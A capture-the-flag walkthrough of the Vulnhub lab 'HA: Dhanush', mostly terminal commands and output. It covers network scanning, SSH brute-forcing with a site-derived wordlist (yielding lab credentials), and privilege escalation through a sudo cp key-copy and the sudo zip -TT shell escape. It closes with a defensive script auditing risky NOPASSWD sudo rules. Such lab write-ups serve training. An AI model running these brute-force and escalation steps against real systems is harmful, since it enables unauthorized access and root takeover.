Dhanush
Identify the target host's IP address
┌──(kali㉿kali)-[~/Vulnhub/dhanush]
└─$ sudo netdiscover -i eth1 -r 192.168.187.0/24
Currently scanning: Finished! | Screen View: Unique Hosts
5 Captured ARP Req/Rep packets, from 3 hosts. Total size: 300
_____________________________________________________________________________
IP At MAC Address Count Len MAC Vendor / Hostname
-----------------------------------------------------------------------------
192.168.187.1 00:50:56:c0:00:01 2 120 VMware, Inc.
192.168.187.155 00:0c:29:ab:6e:4f 2 120 VMware, Inc.
192.168.187.254 00:50:56:e2:20:55 1 60 VMware, Inc.
Nmap scan
┌──(kali㉿kali)-[~/Vulnhub/dhanush]
└─$ sudo nmap -sS -sV -sC -p- 192.168.187.155 -oN nmap_full_scan
Starting Nmap 7.92 ( https://nmap.org ) at 2023-07-12 02:46 EDT
Nmap scan report for 192.168.187.155
Host is up (0.0014s latency).
Not shown: 65533 closed tcp ports (reset)
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
|_http-title: HA: Dhanush
|_http-server-header: Apache/2.4.29 (Ubuntu)
65345/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 e3:2f:3d:dd:ac:42:d4:d5:de:ec:9b:19:0b:45:3e:13 (RSA)
| 256 89:02:8d:a5:e0:75:a5:34:3b:52:3a:6c:d1:f4:05:da (ECDSA)
|_ 256 ea:af:62:07:73:d0:d5:1e:fb:a9:12:62:34:27:52:d9 (ED25519)
MAC Address: 00:0C:29:AB:6E:4F (VMware)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Getting a shell
┌──(kali㉿kali)-[~/Vulnhub/dhanush]
└─$ curl http://192.168.187.155/robots.txt
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL was not found on this server.</p>
<hr>
<address>Apache/2.4.29 (Ubuntu) Server at 192.168.187.155 Port 80</address>
</body></html>
The target has no robots.txt file.
┌──(kali㉿kali)-[~/Vulnhub/dhanush]
└─$ nikto -h http://192.168.187.155
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP: 192.168.187.155
+ Target Hostname: 192.168.187.155
+ Target Port: 80
+ Start Time: 2023-07-12 02:48:11 (GMT-4)
---------------------------------------------------------------------------
+ Server: Apache/2.4.29 (Ubuntu)
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Apache/2.4.29 appears to be outdated (current is at least Apache/2.4.37). Apache 2.2.34 is the EOL for the 2.x branch.
+ IP address found in the 'location' header. The IP is "127.0.1.1".
+ OSVDB-630: The web server may reveal its internal or real IP in the Location header via a request to /images over HTTP/1.0. The value is "127.0.1.1".
+ Server may leak inodes via ETags, header found with file /, inode: 15a4, size: 596d81d0365ae, mtime: gzip
+ Allowed HTTP Methods: GET, POST, OPTIONS, HEAD
+ OSVDB-3268: /images/: Directory indexing found.
+ OSVDB-3233: /icons/README: Apache default file found.
+ 7915 requests: 0 error(s) and 10 item(s) reported on remote host
+ End Time: 2023-07-12 02:48:42 (GMT-4) (31 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
Nikto did not turn up anything of value.
Directory scanning found nothing either.
Build a wordlist from the site and see whether the SSH username and password can be cracked with it:
┌──(kali㉿kali)-[~/Vulnhub/dhanush]
└─$ cewl -d 3 http://192.168.187.155 -w dict.txt
CeWL 5.5.2 (Grouping) Robin Wood ([email protected]) (https://digi.ninja/)
┌──(kali㉿kali)-[~/Vulnhub/dhanush]
└─$ wc -l dict.txt
114 dict.txt
┌──(kali㉿kali)-[~/Vulnhub/dhanush]
└─$ hydra -L dict.txt -P dict.txt ssh://192.168.187.155 -s 65345
The cracked credentials are pinak/Gandiv.
┌──(kali㉿kali)-[~/Vulnhub/dhanush]
└─$ ssh pinak@192.168.187.155 -p 65345
The authenticity of host '[192.168.187.155]:65345 ([192.168.187.155]:65345)' can't be established.
ED25519 key fingerprint is SHA256:MZF9Ir9Jya9Ybbdt2/YwEoX+fcFSl7U+HZU/4UcvdrY.
This key is not known by any other names
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '[192.168.187.155]:65345' (ED25519) to the list of known hosts.
pinak@192.168.187.155's password:
Welcome to Ubuntu 18.04.3 LTS (GNU/Linux 4.15.0-55-generic x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage
* Canonical Livepatch is available for installation.
- Reduce system reboots and improve kernel security. Activate at:
https://ubuntu.com/livepatch
Last login: Wed Feb 15 05:02:20 2023 from 10.1.1.143
pinak@ubuntu:~$ ls -alh
Privilege escalation
pinak@ubuntu:~$ sudo -l
Matching Defaults entries for pinak on ubuntu:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User pinak may run the following commands on ubuntu:
(sarang) NOPASSWD: /bin/cp
pinak@ubuntu:~$
pinak@ubuntu:~$ sudo -u sarang /bin/cp id_rsa.pub /home/sarang/.ssh/authorized_keys
pinak@ubuntu:~$ ssh [email protected] -p 65345
Welcome to Ubuntu 18.04.3 LTS (GNU/Linux 4.15.0-55-generic x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage
* Canonical Livepatch is available for installation.
- Reduce system reboots and improve kernel security. Activate at:
https://ubuntu.com/livepatch
Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings
Last login: Wed Feb 15 06:08:49 2023 from 127.0.0.1
Following the hint in pinak's .bash_history, pinak's id_rsa.pub is copied (via the sudo cp rule, running as sarang) into sarang's authorized_keys; the matching private key can then be used to log in to a shell as sarang.
sarang@ubuntu:~$ sudo -l
Matching Defaults entries for sarang on ubuntu:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User sarang may run the following commands on ubuntu:
(root) NOPASSWD: /usr/bin/zip
sarang@ubuntu:~$ cd /tmp
sarang@ubuntu:/tmp$ TF=$(mktemp -u)
sarang@ubuntu:/tmp$ sudo zip $TF /etc/hosts -T -TT 'sh #'
adding: etc/hosts (deflated 31%)
# cd /root
# ls -alh
total 24K
drwx------ 3 root root 4.0K Nov 8 2019 .
drwxr-xr-x 22 root root 4.0K Nov 8 2019 ..
-rw-r--r-- 1 root root 3.1K Apr 9 2018 .bashrc
-rw-r--r-- 1 root root 1.5K Nov 8 2019 flag.txt
drwxr-xr-x 3 root root 4.0K Nov 7 2019 .local
-rw-r--r-- 1 root root 148 Aug 17 2015 .profile
# cat flag.txt
@p
@@@.
@@@@@
@@@@@@@
*"`]@P ^^
]@P
]@P
,,,, ]@P ,,gg,,
g@@@@@@@@@b ]@P ,@@@@@@@@@@g,
,@@@@@@BNPPNB@@@@@@@@@@@@@@@@P**PNB@@@@@w
g@@@@P^` %NNNNN@NNNNNP *B@@@g
g@@@P` -@ "B@@w
,@@@` ]@ %@@,
@@P- ]@ *@@,
,@@" ]@ *B@
,@N" y@@B %@,
,, g@P- ]@@@P *Bg ,gg
@@@@$,,,,,,,,,,,,,,,,,,,,,,,,,,ggggg@@@@wwwwwwwwwgggggggggww==========mm4NNN"
!! Congrats you have finished this task !!
Contact us here:
Hacking Articles : https://twitter.com/rajchandel/
Nisha Sharma : https://in.linkedin.com/in/nishasharmaa
+-+-+-+-+-+ +-+-+-+-+-+-+-+
|E|n|j|o|y| |H|A|C|K|I|N|G|
That yields the root flag and a root shell.
Lessons learned
- The key to this box is generating a wordlist and then using hydra to crack the SSH username and password.
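Both escalation steps above rest on the same misconfiguration: a NOPASSWD sudo rule for a binary that can write arbitrary files as the run-as user (cp) or run a command of the caller's choosing (zip via -TT). The following added example, not part of the original walkthrough, is a defender-side audit that scans rules in the format `sudo -l` prints and flags exactly this pattern; the sample rules are constructed from the two entries on this box plus one harmless control line, and the RISKY_BINS list is an assumption you would extend from a GTFOBins-style inventory.

```shell
#!/bin/sh
# Added example (not from the original page): flag NOPASSWD sudo rules that
# grant a binary able to write files or run commands as the run-as user.
# Input lines have the shape "(runas) NOPASSWD: /path/to/bin [args]".

# Constructed sample: the two rules found on this box plus a benign one.
SAMPLE_RULES='    (sarang) NOPASSWD: /bin/cp
    (root) NOPASSWD: /usr/bin/zip
    (root) NOPASSWD: /usr/bin/apt-get update'

# Assumed short list; in practice populate from a maintained inventory.
RISKY_BINS="cp zip"

# audit_sudo_rules: reads rules on stdin, prints "RUNAS BIN" for each risky
# NOPASSWD rule, and returns 1 if any were found (0 if the rules are clean).
audit_sudo_rules() {
    found=0
    while IFS= read -r line; do
        # strip the indentation sudo -l adds
        line=${line#"${line%%[![:space:]]*}"}
        case "$line" in
            *NOPASSWD:*) ;;       # only passwordless rules are in scope
            *) continue ;;
        esac
        runas=$(printf '%s' "$line" | sed -n 's/^(\([^)]*\)).*/\1/p')
        cmd=$(printf '%s' "$line" | sed 's/.*NOPASSWD:[[:space:]]*//')
        bin=$(basename "${cmd%% *}")   # first word of the command, path dropped
        for r in $RISKY_BINS; do
            if [ "$bin" = "$r" ]; then
                printf '%s %s\n' "$runas" "$bin"
                found=1
            fi
        done
    done
    return $found
}

# count_risky_rules: number of risky rules in the constructed sample.
count_risky_rules() {
    printf '%s\n' "$SAMPLE_RULES" | audit_sudo_rules | wc -l | tr -d ' '
}

# Stand-alone run: list the offending rules for the sample.
printf '%s\n' "$SAMPLE_RULES" | audit_sudo_rules
```

On a live host, feed it `sudo -l -U <user>` output for each account instead of the sample, and treat any non-zero return as a finding to remediate (drop NOPASSWD, or constrain the command's arguments).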